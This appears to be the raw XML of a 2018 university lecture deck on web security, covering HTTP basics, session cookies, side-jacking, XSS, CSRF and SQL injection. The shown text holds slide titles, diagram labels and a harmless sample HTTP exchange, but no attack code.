            <a:ext cx="1614024" cy="1066606"/>
            <a:chOff x="6477000" y="3028927"/>
            <a:chExt cx="1614024" cy="1066606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6477000" y="3124200"/>
              <a:ext cx="801244" cy="876060"/>
              <a:chOff x="7675224" y="3423138"/>
              <a:chExt cx="291673" cy="344660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Content Placeholder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18" t="14740" r="70725" b="83818"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3423138"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Content Placeholder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37" t="17034" r="70306" b="81524"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3560299"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Content Placeholder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07" t="19263" r="70236" b="79295"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675224" y="3697460"/>
                <a:ext cx="290946" cy="70338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7393396" y="3028927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2013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93397" y="3377564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2014</a:t>
              </a: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91400" y="3726201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2015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2130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Vulnerability Occurrence in Applications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76200" y="1551708"/>
            <a:ext cx="7924800" cy="4925291"/>
            <a:chOff x="457200" y="1551709"/>
            <a:chExt cx="7554931" cy="4089862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800" b="27209"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2261062"/>
              <a:ext cx="7554931" cy="3380509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15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61" b="78028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1551709"/>
              <a:ext cx="7554931" cy="709353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705600" y="5257800"/>
            <a:ext cx="1614024" cy="1066606"/>
            <a:chOff x="6477000" y="3028927"/>
            <a:chExt cx="1614024" cy="1066606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6477000" y="3124200"/>
              <a:ext cx="801244" cy="876060"/>
              <a:chOff x="7675224" y="3423138"/>
              <a:chExt cx="291673" cy="344660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Content Placeholder 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18" t="14740" r="70725" b="83818"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3423138"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Content Placeholder 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37" t="17034" r="70306" b="81524"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3560299"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Content Placeholder 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07" t="19263" r="70236" b="79295"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675224" y="3697460"/>
                <a:ext cx="290946" cy="70338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7393396" y="3028927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2013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93397" y="3377564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2014</a:t>
              </a:r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91400" y="3726201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2015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882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Vulnerability Occurrence in Applications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76200" y="1551708"/>
            <a:ext cx="7924800" cy="4940531"/>
            <a:chOff x="76200" y="1551708"/>
            <a:chExt cx="7924800" cy="4940531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Content Placeholder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800" b="61092"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="2405959"/>
              <a:ext cx="7924800" cy="786128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Content Placeholder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61" b="78028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="1551708"/>
              <a:ext cx="7924800" cy="854251"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Content Placeholder 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2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052" b="43200"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="3200400"/>
              <a:ext cx="7924800" cy="1720735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Content Placeholder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286" b="27209"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4887883"/>
              <a:ext cx="7924800" cy="160435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6705600" y="5257800"/>
            <a:ext cx="1614024" cy="1066606"/>
            <a:chOff x="6477000" y="3028927"/>
            <a:chExt cx="1614024" cy="1066606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6477000" y="3124200"/>
              <a:ext cx="801244" cy="876060"/>
              <a:chOff x="7675224" y="3423138"/>
              <a:chExt cx="291673" cy="344660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Content Placeholder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18" t="14740" r="70725" b="83818"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3423138"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Content Placeholder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37" t="17034" r="70306" b="81524"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3560299"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Content Placeholder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07" t="19263" r="70236" b="79295"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675224" y="3697460"/>
                <a:ext cx="290946" cy="70338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7393396" y="3028927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2013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93397" y="3377564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2014</a:t>
              </a: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91400" y="3726201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2015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857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Basics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2600"/>
            <a:ext cx="2377440" cy="2578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513" y="1493520"/>
            <a:ext cx="1999488" cy="201168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352800" y="2514600"/>
            <a:ext cx="2895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52800" y="2940736"/>
            <a:ext cx="2895600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200400" y="17652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urier" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier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urier-Bold" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A801F"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courie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Courier" charset="0"/>
              </a:rPr>
              <a:t>www.example.com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63240" y="2971800"/>
            <a:ext cx="5623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7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C52B2D"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A801F"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Fri, 17 March 2017 10:10:00 EDT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A801F"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> text/html; charset=UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6A801F"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> 138</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="6A801F"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>close</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> Page&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>  Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>World!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Courie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Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F7001"/>
                </a:solidFill>
                <a:latin typeface="Courier-Bold" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr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7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Management 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2600"/>
            <a:ext cx="2377440" cy="2578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036064"/>
            <a:ext cx="1999488" cy="201168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352800" y="2514600"/>
            <a:ext cx="2895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57882" y="2145268"/>
            <a:ext cx="138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 GET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352800" y="2940736"/>
            <a:ext cx="2895600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91000" y="2571404"/>
            <a:ext cx="118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 OK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368040" y="3494116"/>
            <a:ext cx="2895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73122" y="3124784"/>
            <a:ext cx="138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 GET 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368040" y="3920252"/>
            <a:ext cx="2895600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29428" y="3550920"/>
            <a:ext cx="118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 OK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2157" l="9967" r="89869">
                        <a14:foregroundMark x1="77778" y1="53676" x2="77778" y2="53676"/>
                        <a14:foregroundMark x1="78431" y1="46324" x2="78431" y2="46324"/>
                        <a14:foregroundMark x1="78922" y1="50980" x2="78922" y2="50980"/>
                        <a14:foregroundMark x1="51961" y1="92157" x2="51961" y2="92157"/>
                        <a14:foregroundMark x1="79248" y1="48039" x2="79248" y2="48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22" y="2512232"/>
            <a:ext cx="687697" cy="4584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2157" l="9967" r="89869">
                        <a14:foregroundMark x1="77778" y1="53676" x2="77778" y2="53676"/>
                        <a14:foregroundMark x1="78431" y1="46324" x2="78431" y2="46324"/>
                        <a14:foregroundMark x1="78922" y1="50980" x2="78922" y2="50980"/>
                        <a14:foregroundMark x1="51961" y1="92157" x2="51961" y2="92157"/>
                        <a14:foregroundMark x1="79248" y1="48039" x2="79248" y2="48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398" y="2007544"/>
            <a:ext cx="1009736" cy="6731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92157" l="9967" r="89869">
                        <a14:foregroundMark x1="77778" y1="53676" x2="77778" y2="53676"/>
                        <a14:foregroundMark x1="78431" y1="46324" x2="78431" y2="46324"/>
                        <a14:foregroundMark x1="78922" y1="50980" x2="78922" y2="50980"/>
                        <a14:foregroundMark x1="51961" y1="92157" x2="51961" y2="92157"/>
                        <a14:foregroundMark x1="79248" y1="48039" x2="79248" y2="48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301" y="3031437"/>
            <a:ext cx="693399" cy="46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3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 Side-jacking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2600"/>
            <a:ext cx="2377440" cy="257860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036064"/>
            <a:ext cx="1999488" cy="2011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376" y="3542607"/>
            <a:ext cx="1834896" cy="196291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352800" y="2514600"/>
            <a:ext cx="2895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57882" y="214526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SSL(login)</a:t>
            </a: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52800" y="2907485"/>
            <a:ext cx="2895600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24577" y="2538153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SSL(redirect; set-cookie)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368040" y="3311162"/>
            <a:ext cx="2895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61462" y="2941830"/>
            <a:ext cx="235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Request; cookie=SID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3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FireSheep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (October 2010)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12" y="1600200"/>
            <a:ext cx="7335576" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88038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95FFB3-5D92-074E-B89D-542AE82BF1BE}" vid="{19B8E867-9DEE-184C-A40C-B4D7506C6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AExam</Template>
  <TotalTime>28476</TotalTime>
  <Words>892</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>277</Paragraphs>
  <Slides>38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American Typewriter</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Courier-Bold</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Clarity</vt:lpstr>
      <vt:lpstr>Lecture 26: Web Security</vt:lpstr>
      <vt:lpstr>2015 Security Incidents</vt:lpstr>
      <vt:lpstr>Vulnerabilities by Year</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>HTTP Basics</vt:lpstr>
      <vt:lpstr>Session Management </vt:lpstr>
      <vt:lpstr>Cookie Side-jacking</vt:lpstr>
      <vt:lpstr>FireSheep (October 2010)</vt:lpstr>
      <vt:lpstr>SSL by Default (top 10k)</vt:lpstr>
      <vt:lpstr>Cookie Forgery</vt:lpstr>
      <vt:lpstr>Cookie Forgery</vt:lpstr>
      <vt:lpstr>Cookie Theft</vt:lpstr>
      <vt:lpstr>Chrome Encrypted Cookies</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Domain Object Model</vt:lpstr>
      <vt:lpstr>Same Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>SOP Exceptions</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack vectors</vt:lpstr>
      <vt:lpstr>Example XSS attacks</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQLi in the Wild</vt:lpstr>
      <vt:lpstr>Defenses Against SQL Injection</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications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eleanor@cs.cornell.edu</cp:lastModifiedBy>
  <cp:revision>466</cp:revision>
  <cp:lastPrinted>2018-04-30T16:15:49Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-05T20:19:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-02T18:38:45Z</dcterms:modified>
</cp:coreProperties>
</file>